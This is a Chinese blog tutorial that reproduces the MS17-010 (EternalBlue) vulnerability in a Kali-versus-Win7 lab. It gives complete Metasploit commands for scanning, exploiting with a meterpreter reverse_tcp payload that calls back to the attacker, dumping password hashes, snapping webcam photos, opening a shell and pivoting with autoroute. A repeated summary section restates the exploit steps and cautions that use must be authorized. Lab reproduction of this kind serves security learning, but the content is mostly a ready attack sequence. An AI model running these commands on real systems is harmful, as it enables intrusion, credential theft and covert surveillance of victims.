复现ms17-010漏洞

本文详细描述了如何在KaliLinux和Win7环境下复现著名的MS17-010漏洞,包括环境准备、端口扫描、漏洞检测、利用Meterpreter进行攻击,以及执行哈希加密密码获取、网络控制等操作。整个过程揭示了网络安全的重要性以及防御此类漏洞的必要性。


复现

条件

1.靶机必须为win8以下
2.靶机必须同攻击机处于相同网段(即倒数第二位相同)。
3.靶机的445端口必须要开启。

环境

虚拟机kali为攻击机,win7虚拟机为靶机。
kali IP:192.168.1.129
win7 IP:192.168.1.128
注意:攻击机和靶机的IP的倒数第二位必须相同,即必须处于相同网段。

操作+效果

1.打开kali并登录,在终端输入登录命令
在这里插入图片描述
2.输入密码"kali"
3.使用kali自带的nmap扫描工具,输入代码进行扫描。

nmap -sS 192.168.1.128(靶机IP)

在这里插入图片描述
在这里插入图片描述
可见目标靶机445端口开放,说明该win7靶机具有成功复现ms17-010的条件。

4.打开漏洞库

msfconsole

在这里插入图片描述
在这里插入图片描述
5.查找ms17-010漏洞

search ms17-010

在这里插入图片描述
在这里插入图片描述
6.使用扫描板块来检查是否真实存在ms17-010漏洞。

use 3

在这里插入图片描述
真正存在

7.查看use 3模块需要修改的参数。

show options

在这里插入图片描述
yes选项是必须要填的,可以看到缺少了RHOSTS
8.设置缺少的相关参数。

set rhosts 192.168.1.128

在这里插入图片描述
9.运行扫描模块

run

在这里插入图片描述
10.使用攻击模块

use 0

在这里插入图片描述
11.查看攻击板块的参数信息

show options

在这里插入图片描述
可见rhosets选项为未设置
12.设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置受害者IP,攻击者IP

set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.1.128
set lhost 192.168.1.129

在这里插入图片描述
13.检查参数配置无误后就可以进行攻击了

run

在这里插入图片描述
攻击成功!

让我们来看看“hkl”在干嘛

1.截屏

screenshot

在这里插入图片描述
在这里插入图片描述
2.获取经过哈希加密的密码

hashdump

在这里插入图片描述
3.拍照

webcam_list
webcam_snap

在这里插入图片描述
4.控制靶机的cmd并翻译

shell
chcp 65001

在这里插入图片描述

在这里插入图片描述
5.查看子网

arp -a

在这里插入图片描述
6.返回

exit()

在这里插入图片描述
7.分配网段给我们的攻击机,方便攻击机将靶机作为跳板

run autoroute -s 192.168.8.0/24

在这里插入图片描述
8.返回初始漏洞利用界面

background

在这里插入图片描述

MS17 - 010是一种影响Windows系统的高危漏洞,以下是复现漏洞的大致过程: #### 环境准备 - **目标机**:选择一个受MS17 - 010漏洞影响的Windows系统版本,如Windows 7、Windows Server 2008 R2等。可以从官方网站https://msdn.itellyou.cn/ 下载win7原装镜像,在虚拟机中安装该系统作为目标机。 - **攻击机**:使用Kali Linux系统作为攻击机,Kali Linux自带了许多用于漏洞测试的工具。 #### 漏洞复现步骤 1. **确认目标机存在漏洞** - 使用Nmap工具扫描目标机,检查是否存在MS17 - 010漏洞。在Kali Linux的终端中执行以下命令: ```bash nmap -sV --script smb-vuln-ms17-010 <目标机IP地址> ``` - 如果扫描结果显示目标机存在MS17 - 010漏洞,会有相应的提示信息。 2. **利用Metasploit框架进行攻击** - 启动Metasploit框架,在Kali Linux终端中输入以下命令: ```bash msfconsole ``` - 在Metasploit中搜索MS17 - 010漏洞利用模块: ```plaintext search ms17-010 ``` - 选择合适的利用模块,例如`exploit/windows/smb/ms17_010_eternalblue`: ```plaintext use exploit/windows/smb/ms17_010_eternalblue ``` - 设置目标机的IP地址: ```plaintext set RHOSTS <目标机IP地址> ``` - 设置攻击的有效载荷,例如`windows/x64/meterpreter/reverse_tcp`: ```plaintext set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` - 设置攻击机的IP地址和端口: ```plaintext set LHOST <攻击机IP地址> set LPORT <监听端口> ``` - 执行攻击: ```plaintext exploit ``` - 如果攻击成功,将获得目标机的Meterpreter会话,可以在该会话中执行各种命令,如查看文件、执行程序等。 ### 注意事项 - 漏洞复现应该在合法的、受控制的环境中进行,未经授权对他人的系统进行漏洞测试是违法的行为。 -复现过程中,要注意对目标机和攻击机的操作,避免造成不必要的损失。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值